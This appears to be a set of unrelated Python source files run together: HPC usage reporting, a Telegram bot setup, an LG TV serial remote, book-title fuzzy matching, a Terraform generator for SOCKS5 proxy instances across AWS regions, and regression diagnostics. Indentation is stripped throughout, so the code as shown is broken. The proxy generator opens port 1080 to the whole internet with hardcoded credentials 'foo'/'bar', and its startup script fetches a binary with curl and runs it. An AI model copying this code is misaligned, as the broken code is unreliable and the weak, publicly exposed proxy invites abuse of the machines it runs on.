print("Top projects:")
print("=============\n")
for d in data:
print("Period:", d['date']['name'],"\n")
print_table(*summarise_projects(d, bins))
if 'all' in reports or 'users' in reports:
print("==========")
print("Top users:")
print("==========\n")
for d in data:
print("Period:", d['date']['name'],"\n")
print_simplestats(d['users'], args.limitusers)
print_table(*summarise_users(d, bins))
if 'all' in reports or 'usersbydate' in reports:
print("=============")
print("Users by date:")
print("=============\n")
for user in sorted(set([u for d in data for u in d['users']])):
print("User:", user)
print_table(*summarise_usersbydate(data, user, bins))
if 'all' in reports or 'projectbyusers' in reports:
print("=====================")
print("Top users by project:")
print("=====================\n")
for d in data:
print("Period:", d['date']['name'],"\n")
for project in sorted(d['projusers']):
print("Project:", project)
print_simplestats(d['projusers'][project], args.limitusers)
print_table(*summarise_project(d, project, bins))
def print_simplestats(data, top_n):
# # Rewrite with reduce
# top_usage = 0
# for e in enumerate(sorted(data.items(), key=lambda item: item[1]['core_hours_adj'], reverse=True)):
# if e[0] >= top_n: break
# top_usage += e[1][1]['core_hours_adj']
# bottom_usage = 0
# bottom_n = 0
# for e in enumerate(sorted(data.items(), key=lambda item: item[1]['core_hours_adj'])):
# bottom_usage += e[1][1]['core_hours_adj']
# if bottom_usage > top_usage:
# bottom_n = max(0, e[0] -1)
# break
# if top_n <= len(data):
# print(
# len(data),"active users.",
# "Top", top_n, "("+percent(top_n/len(data))+")",
# "active users have used more than the bottom",
# bottom_n, "("+percent(bottom_n/len(data))+")", "combined",
# )
# else:
# print(len(data),"active users.", "Top", top_n, "skipped")
print(len(data),"active users.")
# Calc and format percent, with safe division
def percent(num, dom):
return "{0:.1%}".format(float(div(num,dom)))
# Safe division
def div(num, dom):
return num / dom if dom else 0
# Shortcut to simplify calcs
def sum_key(data, key):
return sum([d[key] for d in data])
# Take a list of date ranges (as generated by parse_startend) and
# Create a new list containing a list of month-long date ranges
# covering the same periods.
def splitdates(dates, by):
d = []
for date in dates:
if by == 'month':
dt = datetime.datetime.utcfromtimestamp(date['start'])
dt = dt.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
while int(dt.strftime('%s')) < date['end']:
d.append({
'name': dt.strftime('%Y%m'),
'start': int(dt.strftime('%s')),
'end': int(next_datetime(dt.year, dt.month).strftime('%s')),
})
dt = dt + relativedelta(months=1)
elif by == 'year':
dt = datetime.datetime.utcfromtimestamp(date['start'])
dt = dt.replace(month=1, day=1, hour=0, minute=0, second=0, microsecond=0)
while int(dt.strftime('%s')) < date['end']:
d.append({
'name': dt.strftime('%Y'),
'start': int(dt.strftime('%s')),
'end': int(next_datetime(dt.year).strftime('%s')),
})
dt = dt + relativedelta(years=1)
else:
d.append(date)
return d
# Take a range string of format [START][-[END]], where START and END are
# either integers, or dates of format YYYY[MM[DD[HH[MM[SS]]]]] in UTC.
#
# Return a list of dictionaries bounding the start and end of that range
# (start - inclusive, end - exclusive). If input were dates, return dates
# as seconds since the epoch.
def parse_startend(ranges, type='date'):
d = []
for range_str in ranges:
start = 0
end = max_num
if type == 'date':
end = int(datetime.datetime(
*parse_date(max_date),
tzinfo=pytz.timezone('UTC'),
).strftime('%s'))
if range_str:
r = range_def.match(range_str)
if r:
if type == 'date':
if r.group(1):
start_dt = datetime.datetime(
*datetime_defaults(*parse_date(r.group(1))),
tzinfo=pytz.timezone('UTC'),
)
start = int(start_dt.strftime('%s'))
end_dt = next_datetime(
*parse_date(r.group(3) or (r.group(2) and max_date) or r.group(1)),
tzinfo=pytz.timezone('UTC'),
)
end = int(end_dt.strftime('%s'))
elif type == 'int':
start = int(r.group(1) or 1)
end = int(r.group(3) or (r.group(2) and max_num) or r.group(1)) +1
d.append({ 'name': range_str, 'start': start, 'end': end })
return d
# Take a date/time string with optional components of format
# YYYY[MM[DD[HH[MM[SS]]]]] and return that information split into a tuple
# as integers
def parse_date(date):
if date:
r = datetime_def.match(date)
if r:
# Convert strings to integers - don't initialise anything we don't
# have information for.
return ( int(e) for e in r.groups() if e != None )
return None
# Takes similar arguments as datetime, returns a datetime
# object "1" louder, e.g. if args specify a particular month,
# will return the next month in the same year.
def next_datetime(*date_time, tzinfo=pytz.timezone('UTC')):
t1 = datetime.datetime(*datetime_defaults(*date_time), tzinfo=tzinfo)
case = {
1: t1 + relativedelta(years=1),
2: t1 + relativedelta(months=1),
3: t1 + datetime.timedelta(days=1),
4: t1 + datetime.timedelta(hours=1),
5: t1 + datetime.timedelta(minutes=1),
6: t1 + datetime.timedelta(seconds=1),
}
return case.get(len(date_time))
# Takes a list/tuple of datetime arguments (year, month, etc.), filling
# out with the minimum defaults assuming we're interested in the start
# of a month, year, or the Unix epoch.
def datetime_defaults(*date_time):
t = list(date_time)
# datetime needs some minimum information - apply defaults to any missing
if len(t) < 1: t.append(1970) # year
if len(t) < 2: t.append(1) # month
if len(t) < 3: t.append(1) # day
return tuple(t)
# Returns input expanded into a list, split
# as comma separate entries
def commasep_list(data):
l = []
if type(data) == type([]):
for d in data:
l.extend(d.split(","))
elif data:
l.extend(data.split(","))
return l
def project_to_parent(project):
for p in project_parent_regex:
r = p['re'].match(project)
if r: return p['parent']
return project
# Run program (if we've not been imported)
# ---------------------------------------
if __name__ == "__main__":
main()
|
from aiogram import Bot
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.contrib.middlewares.logging import LoggingMiddleware
from aiogram.dispatcher import Dispatcher
from bot import TOKEN
bot = Bot(token=TOKEN)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
dp.middleware.setup(LoggingMiddleware())
|
"""
#Author: Sean Sill
#email: sms3h2@gmail.com
#Date: 2/2/2013
#Notes:
Created this file to act as a remote control from my pc to my computer!
"""
try:
import serial
print 'Serial Imported'
except:
import testserial as serial
print 'Pyserial not found, using a dummy serial port'
pass
import xml.dom.minidom
import binascii
import threading
import Queue
import string
import time
import sys
class lgtv(object):
inputs = {}
alive = False
comPort = ''
setID = ''
baud = ''
def __init__(self, file='', comPort='COM0', setID='00'):
if(file != ''):
self.__importSettings(file)
if(self.comPort == ''):
self.comPort = comPort
if(self.setID == ''):
self.setID = setID
print 'Found baud: ', self.baud
print 'Found Set ID: ', self.setID
print 'Found COM port: ', self.comPort
print 'Opening serial connection on: ', comPort
self.alive = True
#Open serial port
self.__ser = serial.Serial(self.comPort, timeout=0.5)
self.rxThread = threading.Thread(None, target=self.__rx__)
self.rxThread.start()
self.rxQueue = Queue.Queue()
self.txThread = threading.Thread(None, target=self.__tx__)
self.txThread.start()
self.txQueue = Queue.Queue()
#Current TV state
self.__power = False
self.__volume = '00'
self.__input = '00'
def __del__(self):
print 'lgtv destructor'
self.alive = False
self.txThread.join()
self.rxThread.join()
print 'Threads joined now exiting'
def disconnect(self):
self.__del__()
def __importSettings(self, file):
if self.alive:
raise Exception('Can not try to import settings during runtime!!')
try:
print "Attempting to open file"
dom = xml.dom.minidom.parse(file)
#Now to parse the file
node = dom.getElementsByTagName('tv')[0]
if(node.hasAttribute('COM')):
self.comPort = node.getAttribute('COM')
if(node.hasAttribute('setId')):
self.setId = node.getAttribute('setId')
if(node.hasAttribute('baud')):
self.baud = node.getAttribute('baud')
#for input_node in dom.getElementsByTagName('input'):
#print input_node
#name = input_node.getAttribute('name')
#if(name != ''):
#data = input_node.childNodes[0].data
#self.inputs[name] = data
#for volume_node in node.getElementsByTagName('volume'):
#print volume_node
except:
print sys.exc_info()[0]
print "Invalid Config File"
quit()
print "Imported config file"
return
def __tx__(self):
print 'Starting transmit thread'
while self.alive:
try:
self.__ser.write(self.txQueue.get(True, 1).msg)
except:
pass
return
def __rx__(self):
print 'Starting recieve thread'
while self.alive:
try:
data = self.__ser.read(100)
if data is not '':
print "Data recieved: ", data
except:
print "Couldn't Read"
pass
def power(self, on=True):
if on:
self.__power = True
self.txQueue.put(lgMsg(self.setID, 'ka', '1'), False)
else:
self.__power = False
self.txQueue.put(lgMsg(self.setID, 'ka', '0'), False)
return
def input(self, inputString):
"""
Takes a string and updates the input via the string.
This hasn't been completely updated yet, and really needs a way to load in a
text file that allows you to set the values
"""
if(self.inputs.has_key(inputString)):
self.txQueue.put(lgMsg(self.setID, 'xb', self.inputs[inputString]), False)
class lgMsg(object):
"""
Class: lgMsg
creates a message to send to an lg tv
helper class
"""
def __init__(self, setID='00', command='ka', data='FF'):
self.__setID = setID
self.__command = command
self.__data = data
self.msg = self.updateMsg()
def __str__(self):
return self.msg
def __repr__(self):
return self.msg
def updateMsg(self):
self.msg = string.join([self.__command,
' ',
self.__setID,
' ',
self.__data,
'\x0D'],
'')
return self.msg
if __name__ == '__main__':
from Tkinter import *
import ttk
#Load configuration files
tv = lgtv('config.xml', 'COM1')
root = Tk()
root.title('TV Remote')
inputButtons = []
powerButtonOn = ttk.Button(root, text="Power On", command=lambda: tv.power(True))
powerButtonOff = ttk.Button(root, text="Power Off", command=lambda: tv.power(False))
for key in tv.inputs:
inputButtons.append(ttk.Button(root, text=key, command = lambda x = key: tv.input(x)))
#Grid the buttons
powerButtonOn.grid(column=0, row=0)
powerButtonOff.grid(column=0, row=1)
for i in range(len(inputButtons)):
inputButtons[i].grid(column=0, row=(2+i))
root.mainloop()
tv.disconnect(); |
import numpy as np
import pandas as pd
import gzip
import json
import preprocessing as pre
#Read json.gz (gzip)
#Chunk reading needed
def parse(path, lower, limit):
g = gzip.open(path, 'rb')
i=0
for l in g:
i = i+1
if i < lower:
continue
if i > limit:
break
yield json.loads(l)
def getDF(path, lower, limit):
i = 0
df = {}
for d in parse(path, lower, limit):
df[i] = d
i += 1
return pd.DataFrame.from_dict(df, orient='index')
#No chunk reading needed
def parseSmall(path):
g = gzip.open(path, 'rb')
for l in g:
yield json.loads(l)
def getDFSmall(path):
i = 0
df = {}
for d in parseSmall(path):
df[i] = d
i += 1
return pd.DataFrame.from_dict(df, orient='index')
#Transforms big dataset
def transform(df):
df['author'] = df.authors.str[:1]
df['author'] = df['author'].astype(str)
df['author_id'] = df['author'].str.slice(start= 13, stop=26).astype(str)
df['author_id'] = df['author'].str.extract('(\d+)', expand=False)
df['author_id'] = df['author_id'].astype(float)
return df
#Setup external data to fuzzy match to items.csv
#Books1: http://cseweb.ucsd.edu/~jmcauley/datasets.html#social_data
books = pd.read_csv('books.csv', delimiter=',', error_bad_lines=False)
#Books2: https://data.world/divyanshj/users-books-dataset
books2 = pd.read_csv('Dataworld\BX-Books.csv', delimiter=';', quotechar='"', encoding = 'unicode_escape',error_bad_lines=False)
books2Rat = pd.read_csv('Dataworld\BX-Book-Ratings.csv', delimiter=';', quotechar='"', encoding = 'unicode_escape',error_bad_lines=False)
#Transformation
books2Rat = books2Rat.drop(columns=['User-ID'])
books2Rat = books2Rat.groupby(['ISBN']).mean()
books2Rat = books2Rat.reset_index()
#Merge with ratings
books2 = books2.merge(books2Rat, how='left', on='ISBN')
#Adapt scale to other datasets (max = 5)
scaleMin = 0
scaleMax = 5
books2['Book-Rating'] = (scaleMax-scaleMin) * ((books2['Book-Rating']-min(books2['Book-Rating']))/(max(books2['Book-Rating'])-min(books2['Book-Rating']))) + scaleMin
#Other transformation
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].str.strip()
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].replace('[^0-9]+', np.nan, regex=True)
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].str.strip()
books2['Year-Of-Publication'] = books2['Year-Of-Publication'].replace(' ', '', regex=True)
books2['Year-Of-Publication']= books2['Year-Of-Publication'] .fillna('0')
#Put in 1.1.xxxx as publication_date (only year was given for this dataset)
books2['Year-Of-Publication'] = "1/1/" + books2['Year-Of-Publication']
books2.rename(columns={'Book-Title': 'title', 'Book-Author': 'authors', 'Publisher': 'publisher', 'ISBN': 'isbn',
'Year-Of-Publication': 'publication_date', 'Book-Rating': 'average_rating'}, inplace=True)
#Decided to append all (instead of joining), even if some isbn might be duplicates, because other way of writing title/author, other publisher etc.
#Merge books and books2
booksMerge = books2.append(books)
booksMerge = booksMerge.rename(columns = {' num_pages': 'num_pages'})
import gc
del books
del books2
del books2Rat
gc.collect()
#Books3: https://sites.google.com/eng.ucsd.edu/ucsdbookgraph/home
#Wasn't able to load the file all in once, so did chunks instead, but wasn't able to load all at once. So I don't know how many missing authors can be found
#Needs to be uncommented to load all parts
books3Part1 = getDF('Good Reads\Books\goodreads_books.json.gz', 0, 300000)
books3Part1 = transform(books3Part1)
books3Part2 = getDF('Good Reads\Books\goodreads_books.json.gz', 300001, 600000)
books3Part2 = transform(books3Part2)
books3 = pd.concat([books3Part1, books3Part2])
del books3Part1
del books3Part2
gc.collect()
books3Part3 = getDF('Good Reads\Books\goodreads_books.json.gz', 600001, 900000)
books3Part3 = transform(books3Part3)
books3 = pd.concat([books3, books3Part3])
del books3Part3
gc.collect()
books3Part4 = getDF('Good Reads\Books\goodreads_books.json.gz', 900001, 1200000)
books3Part4 = transform(books3Part4)
books3 = pd.concat([books3, books3Part4])
del books3Part4
gc.collect()
books3Part5 = getDF('Good Reads\Books\goodreads_books.json.gz', 1200001, 1500000)
books3Part5 = transform(books3Part5)
books3 = pd.concat([books3, books3Part5])
del books3Part5
gc.collect()
books3Part6 = getDF('Good Reads\Books\goodreads_books.json.gz', 1500001, 1800000)
books3Part6 = transform(books3Part6)
books3 = pd.concat([books3, books3Part6])
del books3Part6
gc.collect()
books3Part7 = getDF('Good Reads\Books\goodreads_books.json.gz', 1800001, 2100000)
books3Part7 = transform(books3Part7)
books3 = pd.concat([books3, books3Part7])
del books3Part7
gc.collect()
books3Part8 = getDF('Good Reads\Books\goodreads_books.json.gz', 2100001, 2400000)
books3Part8 = transform(books3Part8)
books3 = pd.concat([books3, books3Part8])
del books3Part8
gc.collect()
#Author info for dataset
books3Authors = getDFSmall('Good Reads\Books\goodreads_book_authors.json.gz')
#Transformation
books3Authors = books3Authors[['author_id', 'name']]
books3Authors.author_id = books3Authors.author_id.astype(float)
books3 = books3.merge(books3Authors, how = 'left', on = 'author_id')
books3 = books3.rename(columns = {'authors': 'authors_list'})
books3 = books3.rename(columns = {'name': 'authors'})
books3ToDrop = list(filter(lambda value: value.startswith(r'count (#' ) or value.startswith(r'name (#' ) or value.startswith(r'author_id (#' ) or value.startswith(r'role (#' ), list(books3.columns)))
books3 = books3.drop(columns = books3ToDrop)
books3 = books3.rename(columns = {'image_url': 'Image-URL-S', 'name': 'name_2'})
books3['publication_date'] = books3.publication_month.astype(str) + r'/' + books3.publication_day.astype(str) + r'/' + books3.publication_year.astype(str)
books3 = books3.drop(columns = ['publication_day', 'publication_month', 'publication_year', 'author'])
#Append to other 2 datasets
booksMerge = booksMerge.append(books3)
del books3
del books3Authors
gc.collect()
#Fuzzy Script adapted from TowardsDataScience from https://drive.google.com/file/d/1Z4-cEabpx7HM1pOi49Mdwv7WBOBhn2cl/view
## load libraries and set-up:
pd.set_option('display.max_colwidth', -1)
import re
#pip install ftfy # text cleaning for decode issues..
from ftfy import fix_text
from sklearn.feature_extraction.text import TfidfVectorizer
#!pip install nmslib
import nmslib
'''
The below script creates a cleaning function and turns both the master data (the 'clean' data) and the items to be matched against into vectors for matching.
df This is our 'clean' list of company names
df_CF This is the messy raw data that we want to join to the clean list
output1 tf_idf_matrix produced from clean data
output2 messy_tf_idf_matrix produced from the raw data
'''
df = booksMerge
input1_column = 'title'
#Uses preprocessing script of Haowen
df_CF = pre.preprocessing('../items.csv', 'transactions.csv', False)[0]
input2_column = 'title'
del booksMerge
gc.collect()
#transforms company names with assumptions taken from: http://www.legislation.gov.uk/uksi/2015/17/regulation/2/made
def ngrams(string, n=3):
"""Takes an input string, cleans it and converts to ngrams.
This script is focussed on cleaning UK company names but can be made generic by removing lines below"""
string = str(string)
string = string.lower() # lower case
string = fix_text(string) # fix text
string = string.encode("ascii", errors="ignore").decode() #remove non ascii chars
chars_to_remove = [")","(",".","|","[","]","{","}","'","-"]
rx = '[' + re.escape(''.join(chars_to_remove)) + ']' #remove punc, brackets etc...
string = re.sub(rx, '', string)
string = string.replace('&', 'and')
string = string.title() # normalise case - capital at start of each word
string = re.sub(' +',' ',string).strip() # get rid of multiple spaces and replace with a single
string = ' '+ string +' ' # pad names for ngrams...
ngrams = zip(*[string[i:] for i in range(n)])
return [''.join(ngram) for ngram in ngrams]
#See how n-grams works
# print('All 3-grams in "Department":')
# print(ngrams('Depar-tment &, Ltd'))
###FIRST TIME RUN - used to build the matching table
##### Create a list of items to match here:
org_names = list(df[input1_column].unique()) #unique org names from company watch file
#Building the TFIDF off the clean dataset - takes about 5 min
vectorizer = TfidfVectorizer(min_df=1, analyzer=ngrams)
tf_idf_matrix = vectorizer.fit_transform(org_names)
##### Create a list of messy items to match here:
# file containing messy supplier names to match against
messy_names = list(df_CF[input2_column].unique()) #unique list of names
#Creation of vectors for the messy names
messy_tf_idf_matrix = vectorizer.transform(messy_names)
'''
Matching
This script takes the two sets of vectors and matches them to each other. It uses the NMSLIB library https://github.com/nmslib/nmslib as this is the fastest python library avaliable for this matching
Input1 - 'tf_idf_matrix' created from scripts above from the Company Watch bulk data
Input2 - 'messy_tf_idf_matrix' created from the scripts above (from the data set to match against. eg Contracts Finder)
Output - 'nbrs' which contains the index matches across the two inputs alongside a confidence score (lower is better)
'''
# create a random matrix to index
data_matrix = tf_idf_matrix#[0:1000000]
# Set index parameters
# These are the most important ones
M = 80
efC = 1000
num_threads = 4 # adjust for the number of threads
# Intitialize the library, specify the space, the type of the vector and add data points
index = nmslib.init(method='simple_invindx', space='negdotprod_sparse_fast', data_type=nmslib.DataType.SPARSE_VECTOR)
index.addDataPointBatch(data_matrix)
# Create an index
index.createIndex()
#K-Nearest Neighbour
# Number of neighbors
num_threads = 4
K=1
query_matrix = messy_tf_idf_matrix
query_qty = query_matrix.shape[0]
nbrs = index.knnQueryBatch(query_matrix, k = K, num_threads = num_threads)
'''Script for joining matches back to the data set'''
mts =[]
for i in range(len(nbrs)):
origional_nm = messy_names[i]
try:
matched_nm = org_names[nbrs[i][0][0]]
conf = nbrs[i][1][0]
except:
matched_nm = "no match found"
conf = None
mts.append([origional_nm,matched_nm,conf])
mts = pd.DataFrame(mts,columns=['title','title_match','conf'])
results = df_CF.merge(mts,how='left',on='title')
del df_CF
del org_names
del messy_names
del mts
del nbrs
gc.collect()
results.conf.hist()
#Profile of matches - lower is higher confidence
###Last step of algorithm
#Further Transformation
#Only take certain confidence
confTreshold = -0.7
results.title_match[results.conf > confTreshold] = np.nan
results = results.drop_duplicates()
#Match with other columns
#Afterwards there will be some duplicates item-wise, but it is because booksMerge has listet the same book
#(same title) with different isbn etc. (like it is in items, too) > Keep for now, decide later what to do
results = results.merge(df, how = 'left', left_on = 'title_match', right_on = "title", suffixes = ('', '_y'))
del df
gc.collect()
results = results.drop(columns=['title_y'])
#######Do second checky by fuzzy matching authors: Fuzzy Match Row by Row
from fuzzywuzzy import fuzz
results['author'] = results['author'].astype(str)
results['authors'] = results['authors'].astype(str)
results['confAuthor'] = results.apply(lambda x : fuzz.ratio(x.author, x.authors),axis=1)
confAuthorsThreshold = 50
results.authors[(results.confAuthor < confAuthorsThreshold) & (results.author != 'Unknown')] = 'Unknown'
results.isbn[(results.confAuthor < confAuthorsThreshold) & (results.author != 'Unknown')] = 0
results.average_rating[(results.confAuthor < confAuthorsThreshold) & (results.author != 'Unknown')] = -1
results.authors[results.authors == 'nan'] = 'Unknown'
results.authors[results.authors == 'NaN'] = 'Unknown'
#True: There is additional data available that can be used! False: Don't use joined data (conf too low)
results['AdditionalData'] = np.where((results['authors'] == 'Unknown') & (results['isbn'] == 0) & (results['average_rating'] == -1), False, True)
results = results.drop(columns = ['asin', 'format', 'is_ebook', 'kindle_asin', 'edition_information', 'author_id', 'work_id', 'book_id'])
missingValuesAuthorBefore = results[results['author'] == 'Unknown'].iloc[:,0:6].drop_duplicates().shape[0]
#Missing authors are filled in
results.author[(results['author'] == 'Unknown') & (results['authors'] != 'Unknown')] = results['authors']
#Could find?
columns = list(results[results['author'] == 'Unknown'].iloc[:,0:6].columns)
columns.append('authors')
missingValuesAuthorNow = results[(results['author'] == 'Unknown') & (results.authors == 'Unknown')][columns].drop_duplicates().shape[0]
#Was able to find:
print('Was able to find: ' + str(missingValuesAuthorBefore - missingValuesAuthorNow))
results.title_match.isnull().sum()
|
#!/usr/bin/env python3
from string import Template
user_data = '''Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- rightscale_userdata
- scripts-per-once
- scripts-per-boot
- scripts-per-instance
- [scripts-user, always]
- keys-to-console
- phone-home
- final-message
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
sudo yum install -y docker
sudo usermod -a -G docker ec2-user
sudo curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` | sudo tee /usr/local/bin/docker-compose > /dev/null
sudo chmod +x /usr/local/bin/docker-compose
sudo service docker start
sudo chkconfig docker on
sudo cat <<EOF > /etc/docker-compose.yml
version: "3.3"
services:
proxy:
image: xkuma/socks5:latest
ports:
- "1080:1080"
environment:
- "PROXY_USER=foo"
- "PROXY_PASSWORD=bar"
- "PROXY_SERVER=0.0.0.0:1080"
EOF
sudo /usr/local/bin/docker-compose -f /etc/docker-compose.yml up -d
--// '''
region_tmpl = Template("""# --- aws resources for region $region ---
provider "aws" {
region = "$region"
alias = "$region"
}
resource "aws_security_group" "sg_$region" {
provider = "aws.$region"
name = "$project-$region-sg"
description = "Allow incoming socks5 proxy traffic"
ingress {
from_port = 1080
to_port = 1080
protocol = "tcp"
cidr_blocks = ["0.0.0.0/0"]
}
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
}
resource "aws_instance" "ec2_$region" {
provider = "aws.$region"
count = "$${var.counts["$region"]}"
ami = "$ami"
instance_type="t2.nano"
associate_public_ip_address = true
vpc_security_group_ids=["$${aws_security_group.sg_$region.id}"]
user_data="$${var.user_data}"
tags {
Name = "newslister.$region"
Project = "newslister"
}
}""")
region_to_amis = {
'ap-northeast-1': 'ami-0cf78ae724f63bac0',
'ap-northeast-2': 'ami-08cfa02141f9e9bee',
'ap-south-1': 'ami-0aba92643213491b9',
'ap-southeast-1': 'ami-0cf24653bcf894797',
'ap-southeast-2': 'ami-00c1445796bc0a29f',
'ca-central-1': 'ami-b61b96d2',
'eu-central-1': 'ami-06465d49ba60cf770',
'eu-west-1': 'ami-0ea87e2bfa81ca08a',
'eu-west-2': 'ami-e6768381',
'eu-west-3': 'ami-0050bb60cea70c5b3',
'sa-east-1': 'ami-09c013530239687aa',
'us-east-1': 'ami-0422d936d535c63b1',
'us-east-2': 'ami-0f9c61b5a562a16af',
'us-west-2': 'ami-40d1f038',
'us-west-1': 'ami-0d4027d2cdbca669d',
}
var_tmpl = '''variable "counts" {
type = "map"
default = {'''
def generate_main():
for region, ami in region_to_amis.items():
print(region_tmpl.substitute({'project': 'newslister', 'region': region, 'ami': ami}))
def generate_variables():
var = var_tmpl
for region, _ in region_to_amis.items():
var += f'"{region}" = "0"\n'
var += '}\n}'
print(var)
print(f'''variable "user_data" {{
default = <<IN
{user_data}
IN
}}''')
if __name__ == '__main__':
generate_main()
generate_variables()
|
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
from sklearn.metrics import mean_squared_log_error, mean_squared_error, make_scorer, r2_score
from sklearn.utils import resample
from sklearn.preprocessing import StandardScaler
import scipy.stats as stats
from statsmodels.stats.diagnostic import het_breuschpagan
def create_predictions(fitted_logYmodel, data_fe, y):
"""
returns a dataframe of the transformed predictions of the model, which is passed as an argument, and the actual values
arguments
---------
fitted_logYmodel: linear regression model of the logarithm of y vs. x
data_fe: prepared features for prediction
y: target variable
return
------
dataframe
"""
ylog_pred = fitted_logYmodel.predict(data_fe)
y_pred = np.exp(ylog_pred)
y_pred_s = pd.Series(y_pred)
datetime = pd.Series(data_fe.index)
result = pd.concat([datetime, y_pred_s], axis=1)
result.columns = ['datetime', 'count']
result.set_index('datetime', inplace=True)
df = pd.concat([y, result], axis=1)
df.columns = ['truth', 'pred']
return df
def create_predictions_simplelr(fitted_model, data_fe, y):
"""
returns a dataframe of the predictions of the model, which is passed as an argument, and the actual values
arguments
---------
fitted_model: linear regression model of y vs. x
data_fe: prepared features for prediction
y: target variable
return
------
dataframe
"""
y_pred = fitted_model.predict(data_fe)
y_pred_s = pd.Series(y_pred)
datetime = pd.Series(data_fe.index)
result = pd.concat([datetime, y_pred_s], axis=1)
result.columns = ['datetime', 'count']
result.set_index('datetime', inplace=True)
df = pd.concat([y, result], axis=1)
df.columns = ['truth', 'pred']
return df
def plot_diagnostics_timescales(df):
"""
plots multi-panel time series of predictions and actuals on different timescales
arguments
---------
df: dataframe of truth and prediction columns labeled "truth" and "pred"
return
------
2 figures
"""
fig1, ax1 = plt.subplots(2, 1, figsize=(6.4*2.5, 4.8*2.2))
ax1[0].plot(df['truth'].rolling(window=24 * 30).mean(), label='Actual', linewidth=3)
ax1[0].plot(df['pred'].rolling(window=24 * 30).mean(), label='Predicted', linewidth=3)
ax1[0].legend(loc = 'upper left')
ax1[0].set_title("Seasonality with 30-Day-Smoothing", fontweight = "bold")#, size=24, fontweight="bold")
ax1[0].set_ylabel("Bike Rental Count")#, fontsize=20, fontweight="bold")
ax1[1].plot(df.loc['2012-12-01':'2012-12-08'], linewidth=3)
ax1[1].set_title("Weekly cycle", fontweight = "bold")#, fontsize=24, fontweight="bold")
ax1[1].set_ylabel("Bike Rental Count")#, fontsize=20, fontweight="bold")
fig2, ax2 = plt.subplots(2, 2, figsize=(6.4*2.5, 4.8*2.2), sharey=True)
ax2[0, 0].plot(df['truth'].loc['2012-12-17'], label='Actual', linewidth=3)
ax2[0, 0].plot(df['pred'].loc['2012-12-17'], label='Predicted', linewidth=3)
ax2[0, 0].set_title("Monday", fontweight = "bold")
ax2[0, 0].set_ylabel("Bike Rental Count")
ax2[0, 0].legend(loc = 'upper left')
ax2[0, 1].plot(df.loc['2012-12-19'], linewidth=3)
ax2[0, 1].set_title("Wednesday", fontweight = "bold")
ax2[1, 0].plot(df.loc['2012-12-15'], linewidth=3)
ax2[1, 0].set_title("Saturday",fontweight = "bold")
ax2[1, 0].set_ylabel("Bike Rental Count")
ax2[1, 1].plot(df.loc['2012-12-16'], linewidth=3)
ax2[1, 1].set_title("Sunday",fontweight = "bold")
plt.setp(ax2[0,0].get_xticklabels(), rotation=20, ha='right')
plt.setp(ax2[0,1].get_xticklabels(), rotation=20, ha='right')
plt.setp(ax2[1,0].get_xticklabels(), rotation=20, ha='right')
plt.setp(ax2[1,1].get_xticklabels(), rotation=20, ha='right')
return fig1, fig2
def check_lr_assumptions(df, data_fe):
"""
prints multiple statistical tests and returns a dataframe containing residuals
arguments
---------
df: dataframe of truth and prediction columns labeled "truth" and "pred"
data_fe: prepared features for prediction
return
------
dataframe
"""
df['residuals'] = df['pred'] - df['truth']
print("mean of residuals:", df['residuals'].mean())
print("variance of residuals:", df['residuals'].var())
print("skewness of residuals:", stats.skew(df.residuals))
print("kurtosis of residuals:", stats.kurtosis(df.residuals))
print("kurtosis test of residuals:", stats.kurtosistest(df.residuals))
print("normal test of residuals (scipy stats):", stats.normaltest(df.residuals))
print("Jarque Bera test for normality of residuals:", stats.jarque_bera(df.residuals))
print("Breusch Pagan test for heteroscedasticity:", het_breuschpagan(df.residuals, data_fe))
return df
def plot_residuals_hist(df):
"""
plots histogram of residuals
arguments
---------
df: dataframe of truth and prediction columns labeled "truth" and "pred"
return
------
none
"""
df['residuals'] = df['pred'] - df['truth']
plt.figure(figsize = [8.0, 6.0])
plt.hist(df.residuals, bins=30, density=True)
plt.title("Residuals histogram")
mean = np.mean(df.residuals)
variance = np.var(df.residuals)
sigma = np.sqrt(variance)
x = np.linspace(min(df.residuals), max(df.residuals), 100)
plt.plot(x, stats.norm.pdf(x, mean, sigma), label='Gaussian', linewidth=3)
plt.legend()
def plot_diagnostics_lr(df, data_fe):
"""
plots multi-panel diagnostics of linear regression assumptions
arguments
---------
df: dataframe containing residuals columns
return
------
none
"""
fig3, ax3 = plt.subplots(3, 3, figsize=(20, 15))
ax3[0, 0].hist(df.residuals, bins=30, density=True)
ax3[0, 0].set_title("Residuals histogram")
mean = np.mean(df.residuals)
variance = np.var(df.residuals)
sigma = np.sqrt(variance)
x = np.linspace(min(df.residuals), max(df.residuals), 100)
ax3[0, 0].plot(x, stats.norm.pdf(x, mean, sigma), label='Gaussian', linewidth=3)
ax3[0, 0].legend()
ax3[0, 1].scatter(data_fe["yr_2012"], df.residuals, s = 2)
ax3[0, 1].set_title("year_2012 yes/no")
ax3[0, 2].scatter(data_fe["humidity"], df.residuals, s = 2)
ax3[0, 2].set_title("humidity")
ax3[1, 0].scatter(data_fe["windspeed"], df.residuals, s = 2)
ax3[1, 0].set_title("windspeed")
ax3[1, 1].scatter(data_fe["atemp"], df.residuals, s = 2)
ax3[1, 1].set_title("atemp")
ax3[1, 2].scatter(data_fe["weather"], df.residuals, s = 2)
ax3[1, 2].set_title("weather")
ax3[2, 0].scatter(data_fe["hr_8_workingday"], df.residuals, s = 2)
ax3[2, 0].set_title("hr_8_workingday")
ax3[2, 1].scatter(data_fe["windspeed_Sq"], df.residuals, s = 2)
ax3[2, 1].set_title("windspeed_Sq")
ax3[2, 2].scatter(data_fe["humidity_Sq"], df.residuals, s = 2)
ax3[2, 2].set_title("humidity_Sq")
